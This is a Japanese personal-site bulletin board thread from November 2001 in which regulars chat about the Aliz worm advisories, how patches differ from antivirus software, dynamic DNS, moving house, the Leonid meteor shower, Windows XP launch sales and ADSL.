[469] Aliz 投稿者:SEAWorks 投稿日:2001/11/21(Wed) 15:30:06

掲示板だけ見にこられている方のために・・・

○新種ウイルス「W32/Aliz」に関する情報(IPA)
http://www.ipa.go.jp/security/topics/newvirus/aliz.html

○WORM_ALIZ.A (Trend Micro)
http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=WORM_ALIZ.A

少し前に発生したワームですが、日本でも流行の兆しを見せている
ようです。風邪は流行り始めが肝心です。気をつけましょう。

http://www.kisnet.or.jp/to_tera/


[469へのレス] Re: Aliz・・・と無関係なおまけ 投稿者:SEAWorks 投稿日:2001/11/21(Wed) 16:07:31

○北海道で狂牛病の牛、国内2頭目
http://www.asahi.com/national/update/1121/009.html

ふぅ・・・。(--;

http://www.kisnet.or.jp/to_tera/


[469へのレス] Alizのほう 投稿者:いんか道路 投稿日:2001/11/21(Wed) 17:54:14

じゃかじゃか流れてきました(-"-)


[469へのレス] Re: Aliz 投稿者:SEAWorks 投稿日:2001/11/21(Wed) 19:06:57

うちとこ、まだ来ていないんですよぉ〜。こりゃ乗り遅れたかな。(^^;


[469へのレス] Re: Aliz 投稿者:せんだ 投稿日:2001/11/22(Thu) 11:43:42

ALIZウイルスの情報を見て11月18日発見というので21日ウイルス定義更新したノートンAntivirusであわててウイルススキャンしたところです。
これって炭粗菌と同じテロですよ。 暫く添付メール付きのクリップマークを見たら即削除で対応出来るようですが。

この掲示板の皆さんはテクニシャンばかりなので、お恥ずかしい質問を敢えてさせて頂きます。
最新ウイルス定義のAntiVirusソフトで都度スキャンしていくのと、ファイルのセキュリテイホールにパッチをあてることとは同じ事ですか?
いつも疑問に思っているのです。  


[469へのレス] へっぽこだけど・・・ 投稿者:いんか道路 (ID: Ky2kIJU) 投稿日:2001/11/22(Thu) 12:45:43

>ファイルのセキュリテイホールにパッチをあてること

 パッチがあたった部分を突いてくるウィルスには感染しなくなります。
 しかし感染力のあるウィルスが除去されるわけではないですね。
 何かの原因でそれが外に漏れるかもしれません。自分は大丈夫でも他者に迷惑かけるかも。

>最新ウイルス定義のAntiVirusソフトで都度スキャンしていく

 既知の感染力のあるウィルスが除去されます。
 (最近は未知のものも、ある程度検出するんですかね)


[469へのレス] Re: Aliz 投稿者:SEAWorks 投稿日:2001/11/22(Thu) 12:53:29

> 炭粗菌と同じテロ
そうですね。特に最近の無差別テロと同じで、特定の端末を狙わず、
不特定多数にアクセスを試みて自動的に感染・増殖するタイプのもの
が増えていますから、個人・団体に関係なく被害に遭う可能性が高く
なっていますね。

> 同じ事ですか?
パッチはプログラムの不具合などを修正するものですが、アンチウィ
ルスソフトはウィルスからパソコンを守るものです。意図するものが
まったく違いますので注意が必要です。

たとえば、このAlizの様に、Internet Explorer のセキュリティホー
ル(セキュリティ対策上の不具合)が原因の場合は、追ってパッチが
公開されますが、不具合に起因しない場合はパッチは配布されません。

アンチウィルスソフトの場合は、それがセキュリティホールとの因果
関係にかかわらず、ウィルスやワームなどパソコンに被害を与える悪
質なプログラムを検出・除去することができます。ただし、せんださ
んも良くご存知のように、日々増殖するウィルスを検出するためには、
定期的に定義ファイルを更新する必要がありますね。

こんなとこかな。
#あ、いんか道路さんとぶつかった(^^;

http://www.kisnet.or.jp/to_tera/


[469へのレス] Re: Aliz 投稿者:せんだ 投稿日:2001/11/23(Fri) 11:30:35

レス 有り難うございました。 そうでしたか。
私は耐ウイルスソフトが原因となるセキュリテイホールまで塞いでくれるのではと過大な期待を抱いていたものですから。(高望み、身の程知らず)
ウイルスの作成者をブッシュじゃないけどにDead or Aliveで探し出して罰してやりたい!!  


[472] 退院!! 投稿者:かめぞ〜 (ID: CFpVY5A) 投稿日:2001/11/22(Thu) 14:13:27

というわけで、先ほど退院して帰宅いたしました。
これからいろいろ徘徊しますので、ひとまず報告ということで。
会社への復帰は来週になるので、それまでうにゅうにゅ。

#一週間ぶりにメールを受信したら、いっぱいたまってたのはいいが、
#受信後いきなりフリーズ。メールが消えてしまいました。(T_T)
#だいじなメールはなかっただろうな?


[472へのレス] Re: 退院!! 投稿者:SEAWorks 投稿日:2001/11/22(Thu) 14:36:48

わぁ〜い、退院おめでとぉ〜☆
もう大丈夫なんですか?

しばらくは、マッタリとこがめちゃんと遊べますねぇ。
ま、折角ですから、日ごろの苛酷な労働環境を忘れて、
しばしのんびり過ごしましょう。

http://www.kisnet.or.jp/to_tera/


[472へのレス] Re: 退院!! 投稿者:かめぞ〜 (ID: CFpVY5A) 投稿日:2001/11/22(Thu) 14:47:16

どぉもぉ〜。
>もう大丈夫なんですか?
あい。大丈夫です。痛みもまったくありません。
でも、キズモノになっちゃった(爆)

入院中の顛末は、いずれなにかの形で発表したいと思います。

そういえば、ぺっぱ〜さんの登録してくれたドメイン。
IPアドレスが変わっちゃったので、変えないと・・・。
変える方法教えてもらおうかな?
なんか自動で変える方法があるとかないとか・・・。


[472へのレス] Re: 退院!! 投稿者:SEAWorks 投稿日:2001/11/22(Thu) 15:09:34

No-IP.comですね。
http://www.no-ip.com/

ちなみに、私はPostProを使っています。
http://www.kvtek.com/PostPro/

サービス化にも対応していて便利なのですが、メモリのリーク
があるみたいで、数週間放置するとメモリの使用量が十数Mに
なっていたりします。(^^;

http://www.kisnet.or.jp/to_tera/


[472へのレス] Re: 退院!! 投稿者:SEAWorks 投稿日:2001/11/22(Thu) 15:13:29

あ、ぺっぱ〜さんは、確かDiCEのPro版を使っていたと思います。
http://www.hi-ho.ne.jp/yoshihiro_e/dice/index.html
こっちのが日本語版だから、わかりやすいですよ。

http://www.kisnet.or.jp/to_tera/


[472へのレス] Re: 退院!! 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/22(Thu) 15:23:58

退院おめでとうございます。

かめぞ〜サーバ復活ですか?
復活したら IP 教えてくださいね。ドメイン書き換えます。
kamezoh.servemp3.com は、私が設定したドメインですが、
no-ip.com なら、ご自分でも簡単に取得できますよ。


[472へのレス] Re: 退院!! 投稿者:かめぞ〜 (ID: CFpVY5A) 投稿日:2001/11/22(Thu) 15:34:52

>かめぞ〜サーバ復活ですか?
電源入れてるときだけは見えるようにしてあります。
ただ、何も更新してませんが・・・(^_^;)

メールが消えたショックがちょっと・・・

IPは・・・ヒミツです。なんてね。
#ソースを見れば一目瞭然。


[472へのレス] Re: 退院!! 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/22(Thu) 16:22:12

変更しました。使えるようになったと思います。

<任意>.kamezoh.servemp3.com のワイルドカードも有効になっています。
バーチャルホストも OK ですよん。
もちろん MX もOK。メールサーバ立てれば 自宅メール鯖だってできちゃいます。


[472へのレス] Re: 退院!! 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/22(Thu) 16:34:01

>DiCEのPro版
600円 銀行振り込みしようとしたら、手数料が400円。
なんか すっごく損した気分になりますね。

ところで、Neon Mail Server には、POPPASD(ポート106)は無いのでしょうか?
ユーザから簡単にサーバパスワードが変更できたらなぁ って思うんです。


[472へのレス] Re: 退院!! 投稿者:SEAWorks 投稿日:2001/11/22(Thu) 16:49:37

> 手数料が400円
そうそう。小額振込みのときって、なんかねぇ。

> POPPASD(ポート106)
いまのところ、その機能はないようです。Pro版では実装される
かもしれませんね。フリー版は、とにかく必要最低限のエンジン
として動くものを構築されているようですよ。

ま、開発キットがあるから、あとは自分で作ってねって感じなの
かな。(^^;

あ、トップに書いたトラブルですが、とりあえずベータ版を作っ
て送ってきてくださいましたので、現在様子見中。。。

http://www.kisnet.or.jp/to_tera/


[472へのレス] Re: 退院!! 投稿者:Catfish (ID: RbHw4mI) 投稿日:2001/11/23(Fri) 07:37:13

退院おめでとうございます〜。
あまりムチャせず生活してくださいね・・・。

http://www.geocities.co.jp/SiliconValley-Bay/2630/


[470] とりあえず 投稿者:SEAWorks 投稿日:2001/11/21(Wed) 19:08:28

電話回線つながりました。
なんか、電話線があたらしいからか、48Kbpsでてます。うれしいぃ〜!


[470へのレス] Re: とりあえず 投稿者:やまだ (ID: ApwJyqU) 投稿日:2001/11/21(Wed) 23:46:13

お引越しお疲れ様でした。祝電話線開通 (●^o^●)
Linux鯖の構築で随分ご無沙汰してました。

新築オメデトウ御座います...良いな〜♪


[470へのレス] Re: とりあえず 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/22(Thu) 08:14:41

ブロードバンドのご予定は?


[470へのレス] Re: とりあえず 投稿者:SEAWorks 投稿日:2001/11/22(Thu) 08:22:41

> Linux鯖
もう立ち上がりましたか?あ、あとで見に行ってみよっと。

> ブロードバンドのご予定は?
えぇ〜、一応断られなかったらADSLにする予定ですけど、それ以前に
ダンボールの山とか、ツレの実家の別宅一軒分積み上げてある荷物な
ど、片付けものが・・・。これが終わったらボチボチ始めようかなぁ
と思ってます。

http://www.kisnet.or.jp/to_tera/


[470へのレス] Re: とりあえず 投稿者:かず 投稿日:2001/11/22(Thu) 09:46:21

引っ越しお疲れさまでした。
新居か〜〜いいな〜
早くうちも自分の家がほしいです。


[470へのレス] Re: とりあえず 投稿者:SEAWorks 投稿日:2001/11/22(Thu) 10:02:37

ありがとうございます。

> 自分の家
でも、25年もローンがありますから、家賃とどっちがいいのかなぁ
というのもありますけどね。(^^;

http://www.kisnet.or.jp/to_tera/


[468] 新居へお引っ越しおめでとうございます 投稿者:せんだ 投稿日:2001/11/21(Wed) 11:08:56

最近の仕様は色々な機器に対応して、引き込み口など事前に設計できるようで便利なようです。
しかし設計段階で知恵を絞ったつもりででも住んでみるとどこかにマンホールがあるのが常です。  これに対応するのが生活の知恵です。
みふい〜さんのアドヴァイスもかなりの線ですが私は常識的に高級マットレスをお奨めします。 将来ベット生活を考えられるならこれが一押し!
 新居での夢が豊かにありますように


[468へのレス] Re: 新居へお引っ越しおめでとうございます 投稿者:SEAWorks 投稿日:2001/11/21(Wed) 11:41:10

せんださん、こんにちは。

> 高級マットレスをお奨めします
こ・・・こここ・・・高級ですとぉ〜!?
うちには縁の無い単語ですぅ〜(^^;

> 新居での夢が豊かにありますように
ありがとうございます。
うちは、そんなに夢のある家というわけではなくて、とりあえず
前に住んでいた家の傷みが激しくて、リフォームするのにかかる
お金と新築するお金が同じ程度だったので、この際ですから、え
いっ!って建てちゃった実用重視(雨風防げりゃなんでもいい系)
のお家なんです。

でもまあ、せっかくですから、LANの壁内配線だけはしました
ので、これを子供たちが使うようになると良いなぁなんて思って
います。

http://www.kisnet.or.jp/to_tera/


[468へのレス] Re: 新居へお引っ越しおめでとうございます 投稿者:せんだ 投稿日:2001/11/21(Wed) 16:35:14

大型家具なんかうんと買い込まれた後ですが、人間眠るのは人生の40%を占めます。 (Seaworkさんは睡眠時間は少ないかもしれませんが・・)
また安眠は極めて重要な作業です。 それを思うと思い切るべき所と思うのですが・・。   これからの使用期間を思えば一時の出費は痛いのですがそれなりの費用効果は十分あります。
高級なんて縁がないなんて仰らず、旦那様の反対なんかにメゲルことなく検討なさっては・・・。
貴女の夢安かれ!  ちなみに寝具メーカとは無関係です。  それからイメージの羊は悩んだのですがさまよえる羊ですからまあいいかと。


[468へのレス] Re: 新居へお引っ越しおめでとうございます 投稿者:SEAWorks 投稿日:2001/11/21(Wed) 17:04:31

よぉ〜っし!週末は寝具売り場に探しに行くぞぉ〜!
#ワタクシ、一応 旦那様 ざます。(^^;

http://www.kisnet.or.jp/to_tera/


[467] 本日の最近の傾向。 投稿者:みふぃ〜 (ID: DmcS83s) 投稿日:2001/11/21(Wed) 10:23:21

「動線」ではないでしょうか。

あるいはSEAWorksさん電気人間説。
引越しお疲れ様でした。
板間にお布団は大変そうですね。
寝袋を蓑虫状に天井からつるすのをオススメします。ブラーンと。
空間の有効活用。いえ、無論ワタシはやっていませんよ。
単に誰かがやっているのを観たいだけです。

あるいは肉襦袢を強化するというのはどうでしょうか。
身体にマットレスを常時装着。


[467へのレス] Re: 本日の最近の傾向。 投稿者:SEAWorks 投稿日:2001/11/21(Wed) 11:07:27

> 「動線」
あ!い・・・いかぁ〜ん!あぁ〜!
銅線でもいいかも。>ワタシハデンキニンゲン

> 寝袋を蓑虫状に天井からつるすのを
人間引き掛けローゼット。(^^;

> 身体にマットレスを常時装着
キャプテンTにお任せいたします。m(__)m

http://www.kisnet.or.jp/to_tera/


[466] しし座流星群 投稿者:何処吹く風 (ID: MXxXadg) 投稿日:2001/11/20(Tue) 10:30:22


 鯖復刻に、かかりっきりな毎日ですが、行ってきました
 しし座流星群。
 車で、1時間ちょっとのところに、美星町という
 いかにも、星にゆかりがありそうな山村があるのですけど
 3年前と同様、美星天文台の前の草っ原に寝袋、毛布を
 持ち込んで、天体ショーを楽しみました。3時頃には
 引き上げたので、いちばんのピーク時の様子は観察できて
 いないのですけど、それでも、一度に、数個の流星が出現
 し、空の1/4ぐらいが、はぁーっとフラッシュをたいた
 ように明るくなったりする流星嵐は、それはもう、見事で
 した。観察しているあいだじゅう、くまなく晴れていまし
 たし、町ぐるみで、星の観察に取り組んでいるだけあって
 よぶんな光もなく、大満足な一夜でした。


[466へのレス] Re: しし座流星群 投稿者:SEAWorks 投稿日:2001/11/20(Tue) 11:27:09

うぅ・・・、お引越しで疲労困憊。熟睡状態でしたぁ〜。というか、
うちとこは、あいにく曇りのお天気でみられなかったみたいですし、
ライブ中継を見たくてもインターネットにもつなげない寂しい状況。

みたかったなぁ〜。

http://www.kisnet.or.jp/to_tera/


[466へのレス] Re: しし座流星群 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/20(Tue) 12:49:53

んーむ、さすがに日曜深夜(月曜未明)でしたから、
私はすっかり寝ていました。
今年は結構綺麗だったらしいですねぇ。

今度は金曜の夜か土曜の夜になるように へーるぼっぷ君に
メールを出したいので、アドレス教えてください。


[466へのレス] Re: しし座流星群 投稿者:じゅん (ID: dXF.icc) 投稿日:2001/11/20(Tue) 13:19:07

土曜日に風邪ひいてしまって、それどころじゃありませんでした。残念です。見たかった。

http://usagi.tadaima.com/omori/


[466へのレス] Re: しし座流星群 投稿者:いんか道路 投稿日:2001/11/21(Wed) 02:15:26

3時過ぎに見ようと外に出たら曇ってました。しくしく。
5時ごろ寝る前に空を見上げたら、おお、流れてるじゃありませんか。
ピークに比べたら残り滓みたいなものでしょうが、でも10個くらいみたかな。


[463] XP深夜販売狂想曲 投稿者:田中@艦長 投稿日:2001/11/16(Fri) 01:52:44

よせばいいのに寒い中、自宅から豪天号で天神まで出撃。東京で言うなら東京駅から新宿までチャリで行く
イメージですな。(距離は全然違うけど)

アキバじゃあるまいし、地方都市の深夜販売だとタカをくくっていたらそこには週末より多くの人出があって
大惨敗。なんでこんなに人がいるんだという感じ。客の目的はXPよりも特価品といった感じで、6800円の
MOドライブとか、75%引きのニコンのデジカメとか、10枚で100円のCD-Rメディアとかが飛ぶように売れてい
ました。地元テレビ局も取材に来ていましたね。XPは山積みになっていたけどそこそこは売れていた模様。

もっともパワーユーザーは既に発売になっているOEM版を購入する人が多く、敗北する人を見ていても
一般ユーザとおぼしき人が大半だった。残りは学生でアカデミックパッケージに敗北していた模様。


[463へのレス] Re: XP深夜販売狂想曲 投稿者:SEAWorks 投稿日:2001/11/16(Fri) 08:32:37

でぇ〜!いったんですかぁ〜?さすが・・・。
うちの周辺でも深夜販売していたところもあったみたいですけど、
さすがに近寄りがたい雰囲気があります。(^^;

で、OEM版をすでに持っておられる艦長さんは、製品版にも査収レー
ダーが働きましたか?

http://www.kisnet.or.jp/to_tera/


[463へのレス] Re: XP深夜販売狂想曲 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/16(Fri) 10:11:10

そうかぁ。発売されたんですね。
ウィンドーやタスクバーのイメージがずいぶん変更になっているみたいですね。
使いやすくなってるのかなぁ。


[463へのレス] Re: XP深夜販売狂想曲 投稿者:田中@艦長 投稿日:2001/11/16(Fri) 23:58:56

ちゃんとした箱が欲しかった(アホですな)ので、イージス
対応3次元査収レーダー(爆)が反応しました。

まあXPに関してはMSDNの関係でProfessionalとHOMEそれぞれ
10台のマシンにインストールできるCDも持ってはいるのです
が・・・

Windowsなんかのイメージは変わりましたね。相変わらずダサイ
デザインですけど。この点に関しては永久にMacOSの後を追うこ
とになりそうですね。


[463へのレス] Re: XP深夜販売狂想曲 投稿者:SEAWorks 投稿日:2001/11/17(Sat) 11:00:56

> 3次元査収レーダー
死角無し。すばぁ〜らすぃ〜。

ということで、ぼちぼちパソコンも移動することになります。
前半の大型家具の移動ですでに腰痛が・・・。


[463へのレス] Re: XP深夜販売狂想曲 投稿者:田中@艦長 投稿日:2001/11/18(Sun) 11:12:58

3次元査収レーダーの唯一の死角はオレ財布の財務状況の把握
を妨害し、一時的に金銭感覚を麻痺させることかな(汗)


[463へのレス] Re: XP深夜販売狂想曲 投稿者:SEAWorks 投稿日:2001/11/20(Tue) 08:27:27

ミサイルのごとくお財布から飛び立って行くのですねぇ。(^^;

http://www.kisnet.or.jp/to_tera/


[463へのレス] Re: XP深夜販売狂想曲 投稿者:田中@艦長 投稿日:2001/11/20(Tue) 18:50:12

なにせ私の査収ミサイルは垂直発射セルに収納され敗北目標を
同時に10個捕捉し確実に追尾命中するというシロモノなので・・(汗)


[465] 電子ブロック 投稿者:いんか道路 投稿日:2001/11/19(Mon) 11:49:44

学研の大人の科学シリーズ。ご存じの方も多いでしょう。

 http://kids.gakken.co.jp/kit/otona/index.html

それのバナーで見ただけなんですけど、「電子ブロック復刻」ですと。買ってしまうかも知れない・・・


[465へのレス] Re: 電子ブロック 投稿者:じゅん (ID: dXF.icc) 投稿日:2001/11/19(Mon) 13:49:12

> 学研の大人の科学シリーズ
学研社内で、これ作ってる担当者の一人を良く知ってます。
ただの飲み友達ですが。もし良かったら、買って上げてください。

http://usagi.tadaima.com/omori/


[465へのレス] Re: 電子ブロック 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/19(Mon) 14:05:27

こ、鉱石ラジオ!!欲しい。
鉱石検波+1トランジスタ増幅回路らしい。

鉱石検波がうまくいかなかったときでも トラ検ラジオとして動いてしまうので、
それを阻止するためにわざわざローパスフィルタを入れてあるあたり、設計者のこだわりを感じます。
これで、鉱石による針接触検波器が動かない限り、ラジオが聞こえない仕組みになっているようですね。


[465へのレス] Re: 電子ブロック 投稿者:みふぃ〜 (ID: DmcS83s) 投稿日:2001/11/20(Tue) 00:03:32

買います買います。


[465へのレス] Re: 電子ブロック 投稿者:SEAWorks 投稿日:2001/11/20(Tue) 08:38:34

やや、いんか道路さん、おひさし節です。

電子ブロックですかぁ。なんか、わくわくしちゃいますよねぇ。
これかって、ちょっと基礎的なこと勉強しようかな。(^^;

http://www.kisnet.or.jp/to_tera/


[464] お引っ越しおつかれさまでした 投稿者: (ID: ogesZG.) 投稿日:2001/11/16(Fri) 15:38:26

お引っ越しお疲れさまでした。

まだまだ、細々としたことが残っているかと思いますが、
筋肉痛に惨敗しながら、がんばってください。


[464へのレス] Re: お引っ越しおつかれさまでした 投稿者:SEAWorks 投稿日:2001/11/16(Fri) 17:03:29

はやっ!お引越しは明日です。ほいでもって、明日はお天気悪そう
なので、実際のところ日曜日になってしまうかも・・・ということ
で、筋肉痛回復日として月曜日も有給休暇の届けをだしてきました。(^^;

http://www.kisnet.or.jp/to_tera/


[464へのレス] お引っ越しおつかれさまでした 投稿者:いんか道路 投稿日:2001/11/19(Mon) 11:46:51

おひさしぶりです。
お引っ越しいかがでしたでしょうか。
自分の経験では、とりあえず引っ越しが終わっても、なかなか片づかなくって、落ち着かないんですよね。とはいえ、ひとまず、お疲れさまでした。


[464へのレス] Re: お引っ越しおつかれさまでした 投稿者:じゅん (ID: dXF.icc) 投稿日:2001/11/19(Mon) 13:53:45

お引越し、無事終わりましたか? お疲れ様です。
じゃ、早速お引っ越し祝いに・・・

そう言えば、かめぞ〜さんそろそろ戻って来ないかなぁ?

http://usagi.tadaima.com/omori/


[464へのレス] Re: お引っ越しおつかれさまでした 投稿者:SEAWorks 投稿日:2001/11/20(Tue) 08:30:47

やぁ〜やぁ〜、みなさん、お元気ですかぁ?
とりあえず、仮住まいに運び込んでいた生活するのに必要なものはお
引越しがおわりました。まだダンボールが転がっていておちつきませ
んけどね。

パソコンもとりあえず繋ぎましたし、あとは明日の電話工事待ちになっ
ています。ぼちぼちやっていこうっと。

http://www.kisnet.or.jp/to_tera/


[458] 板の間にお布団 投稿者:じゅん (ID: dXF.icc) 投稿日:2001/11/13(Tue) 15:11:23

私も、板の間にお布団です。
ベッドだと、狭くなるから、私も好きじゃないですね。
それと、落ちると痛い。ってそんなに寝相悪くは無いんですけど。
子供の頃、2段ベッドの上の段から落ちたらしいです。親が見てたら、そのまま黙って、また登って寝たそうです。全然記憶に無いんですけどね。
マットは敷いた方が良いですよ。(笑)

http://usagi.tadaima.com/omori/


[458へのレス] Re: 板の間にお布団 投稿者:SEAWorks 投稿日:2001/11/13(Tue) 16:16:06

> 私も、板の間にお布団です。
お!もうすぐお仲間になりますよ!
やっぱりマットレスひいた方が(あ、江戸弁)良いですよねぇ。
買ってこよっと。

http://www.kisnet.or.jp/to_tera/


[458へのレス] Re: 板の間にお布団 投稿者:じゅん (ID: dXF.icc) 投稿日:2001/11/13(Tue) 16:37:26

> マットレス
何で、マットレスなんでしょうね。
マットがあるのに、マットレスとは、これいかに?

http://usagi.tadaima.com/omori/


[458へのレス] Re: 板の間にお布団 投稿者:SEAWorks 投稿日:2001/11/13(Tue) 17:02:39

あ、それ、私も積年の謎です。だれか教えてくらはい。(^^;

http://www.kisnet.or.jp/to_tera/


[458へのレス] Re: 板の間にお布団 投稿者:SEAWorks 投稿日:2001/11/13(Tue) 17:28:29

ブックシェリフベーシックに教えてもらいましたら、
mattress。lessぢゃないのね。(^^;

語源 古フランス語より.もとはアラビア語 matrah(マット)

だそうです。

http://www.kisnet.or.jp/to_tera/


[458へのレス] Re: 板の間にお布団 投稿者:田中@艦長 投稿日:2001/11/13(Tue) 23:04:28

あっしは、板の間に布団なしの直寝です。理由は布団を敷く
ための領域確保できないからです(爆)
ちなみに領域解放するスペースもありません(悲)
布団で寝るのは実家に帰省した時のみです。
おかげで固いところに寝るのにすっかり抵抗が無くなりました。


[458へのレス] Re: 板の間にお布団 投稿者:みふぃ〜 (ID: DmcS83s) 投稿日:2001/11/14(Wed) 09:36:40

艦長殿:おいら毎日クイックフォーマットで強制的に領域確保。
翌日データ復帰。そんな毎日デス。

じゅんさん、SEAWorksさん:う。板間にお布団は冷たそう・・・。
マットレスないと腰が痛くなりそうですね。
(艦長殿のはもはや修行の一環?)


[458へのレス] Re: 板の間にお布団 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/14(Wed) 10:53:25

社員寮に住んでます。6畳+ちょっとの板スペースです。

背の高いベッドを入れてまして、その下に机とか本棚、PC が収まってます。
かなりのガラクタ持ちの私ですけど、このベッドのおかげで DDR専用コントローラを敷く
スペースも確保できています。(^^)v

#DDRも、ここ1年ほどで意味が変わってしまいましたねぇ。


[458へのレス] Re: 板の間にお布団 投稿者: (ID: ogesZG.) 投稿日:2001/11/14(Wed) 12:53:54

お久しぶりです。

私は、フローリングに煎餅布団です。

畳とちがって、フローリングで万年床をつくると、
布団の裏がカビます。マジで・・・(^_^;

>みふぃ〜さん
盲腸(虫垂炎)は、基本的に1週間〜10日程度みたいですよ。
手遅れだと、腹膜炎で1ヶ月の入院となります。


[458へのレス] Re: 板の間にお布団 投稿者:みふぃ〜 (ID: DmcS83s) 投稿日:2001/11/14(Wed) 14:35:14

何気に見逃していましたが、 "-ress"は女性を示す接尾語なり(waitress, actress など)。
マットレスはご婦人なんですね。

ぺっぱ〜さん:
あのタイプのベッド、便利そうなんですけどそれこそ寝ぼけて落ちそうで怖いです。
そういう経験はないのでしょうか。
DDRってあれですよね?DDRメモリをゲーム本体にセットして画面に表示される転送速度の
光にあわせてステップを踏むという、人間技を超えたゲーム。
だったら大変。

ま さん:
そうですか、基本的には長期入院にはならないんですね。よかったよかった。
「さらりと不吉なことを書くのが ま さんらしいな」、と思っては失礼でしょうか(笑)。


[458へのレス] Re: 板の間にお布団 投稿者:SEAWorks 投稿日:2001/11/14(Wed) 15:23:31

艦長は寝袋が実に似合いそうですね。(^^;

みふ氏> マットレスはご婦人
う、名前だけはちょっぴりうれしい風味付けがあるんですね。

まさん> 腹膜炎で1ヶ月
そうなんですよね。あと、お医者さんの判断ミスなんかも困りますよね。

ぺっぱ〜さん> 背の高いベッド
私も落ちそう。柵も乗り越えて・・・。


[458へのレス] Re: 板の間にお布団 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/14(Wed) 15:56:22

足がにょきって出て、危ないときもありましたよ。
あと、寝相が悪かったら布団が落ちてしまいます。

このベッドを買ってまもなくいままで使っていたベッドを
処分したんですが、そのときに使っていたベッドのサイドガードを
縛り付けています。これなら安心です。

ベッドの下に机とPCがあるんですけど、ふつう、CRTより上のスペースって
なかなか使えませんよね。
私の場合は 手の届く高さのところにベッドの底面があるので、ねじやヒートンを使って
いろんなものをぶら下げてます。

スピーカー、MIDI音源、蛍光灯。。
いまは退役しましたが、ISDNルータ、アナログモデムなどもぶら下げてました。
けっこう有効利用できるスペースがとれるんです。(^^)


[458へのレス] Re: 板の間にお布団 投稿者:かず (ID: lwTVdQ2) 投稿日:2001/11/14(Wed) 20:39:29

今晩は。

自分も子供の頃に、2段ベットの上から落ちたことがあります。(記憶にないですけど)
その頃は、自分達の隣に、親のベットも置いてあり、隙間としては
20センチ位でしたが、その間に挟まったまま、朝まで熟睡でした。
朝になって目を覚ましてビックリ仰天!?(一体ここはどこ?)状態に
なったことがあります。
今は、6畳の部屋に、ダブルとシングルを置いて寝てます。
私は、シングルで寝てます。(6畳に2つも置くとベットでいっぱい)


[458へのレス] Re: 板の間にお布団 投稿者:SEAWorks 投稿日:2001/11/15(Thu) 09:25:26

ぺっぱ〜さん> 足がにょきって出て、危ないときもありましたよ。
おお!さすが190cm83kg(誇張されたイメージ)のぺっぱ〜さん。
軽々と柵を乗り越えられますね。

ぺっぱ〜さん> いろんなものをぶら下げてます。
それ、ひょっとしてオタクの部屋って言うんじゃ・・・。(^^;

かずさん> 記憶にないですけど
そりゃあ〜た、記憶喪失っていうんじゃ・・・。

かずさん> その間に挟まったまま
そういえば、以前自動車の前後のシートの間に四角いエアインマット
を置いて、子供がそこに挟まって窒息死するなんて事故がたくさんあ
りましたね。良くご無事で。

http://www.kisnet.or.jp/to_tera/


[458へのレス] Re: 板の間にお布団 投稿者:ぺっぱ〜 (ID: Fp15Jx2) 投稿日:2001/11/15(Thu) 09:34:08

誇張しすぎ。(^^)
183cm、66kg です。ちゃんとベッドに収まります。えぇ。

>オタクの部屋
そうなん?しらんかった。便利なのに〜
オタクじゃなくて、マニア と呼んでください。はい。


[458へのレス] Re: 板の間にお布団 投稿者:田中@艦長 投稿日:2001/11/16(Fri) 01:57:24

身長で10cm負け、体重で10kg+α勝っているオレは惨敗ダー。

>(床に直寝は)修行の一環

既にその修行は20年以上続いています。筋金入りとはこのことですな。ははは。
ふにゃふにゃの布団やベッドでは眠れない体になってシマッタ。


[460] 8M ADSL 投稿者:QUE 投稿日:2001/11/13(Tue) 22:34:57

久しぶりの書き込みです。

やっと8M ADSLが開局しそうです(11月15日)。

当初はYahoo!!BBに予約していました。(7月4日)
8月サービス開始が9月に伸びてからというもの、8月中に来たメール
『9月中開局予定・・・・』。それを信じてぐっと我慢。

けれども9月20日、21日・・・と後半になってもYahoo!!BBから音沙汰
なし。なのでメール出しましたが、回答は『今しばらくお待ちくださ
い』と不明瞭な回答。

けれども8Mという魅力に我慢しつづけ、9月30日・・・・何もなし。

なので、その日解約。というのも明日からE-ACCESSで8M ADSL予約
申し込み。E-ACCESSでは私の地区は11月開局予定。なので、別に
いいやと、予約。11月とわかっているから、イライラせずにYahoo!!BB
のサイトで開通予定一覧を鑑賞。

10月15日開通予定と発表されていましたが、18日・20・22・・・
結局10月31日開局したみたいです。けれども現在空きポートがない
状態。

今週末には8MADSLが体感できると思うとうれしい次第です。

おしまい


[460へのレス] Re: 8M ADSL 投稿者:SEAWorks 投稿日:2001/11/14(Wed) 15:16:21

お、いよいよですね。うらやましいなぁ。
全国津々浦々、続々とADSL開設のご報告。うちも、なんかアクションを
起こさなくては(^^;


[460へのレス] Re: 8M ADSL 投稿者:QUE 投稿日:2001/11/15(Thu) 23:11:01

今 8M ADSL体感中。早い!の一言。サイト閲覧はストレスなく。
といった感じです。

やはり、スピードを数字で知りたいので、意味もなく数十メガの
ファイルをダウンロードしてます。(^^;

windows updateなどで10Mくらいの修正パッチを落とすも1分。
・・・

ただ実際のスピードは360kbpsくらい。

設定とか環境とかが原因だと思いますが、今月は楽しい日々が続き
そうです。


[462] 携帯何使ってます? 投稿者:Y.Takaya 投稿日:2001/11/15(Thu) 13:19:03

こんにちは。雪降ってきちゃいましたよ。
ところで、みなさんは携帯なに使ってます?もっぱらPCでのメールが多いと思うけど携帯メールなんかも利用してますか。
小生P206からいよいよiモード機種への交換を考えてまして、F503iSorN503iSか迷ってる次第です。


[462へのレス] Re: 携帯何使ってます? 投稿者:じゅん (ID: dXF.icc) 投稿日:2001/11/15(Thu) 13:29:30

> 雪降ってきちゃいましたよ
どちらですか? まさか、富士山頂? (んなわけないですね)

携帯メールの話は、きいろさんのとこで、前に話題になってましたね。
私は、J-Phone ですが、最近サーバがspamによると思われる過負荷で、時間帯とかで使い物にならない時が有って困り物です。早くなんとかして欲しいです。とりあえず、spamのブロックぐらいすぐに対応して欲しい。
次は、写メールにしようと思っているんですが、余計メールが重たくなるし、大丈夫なのか心配です。

http://usagi.tadaima.com/omori/


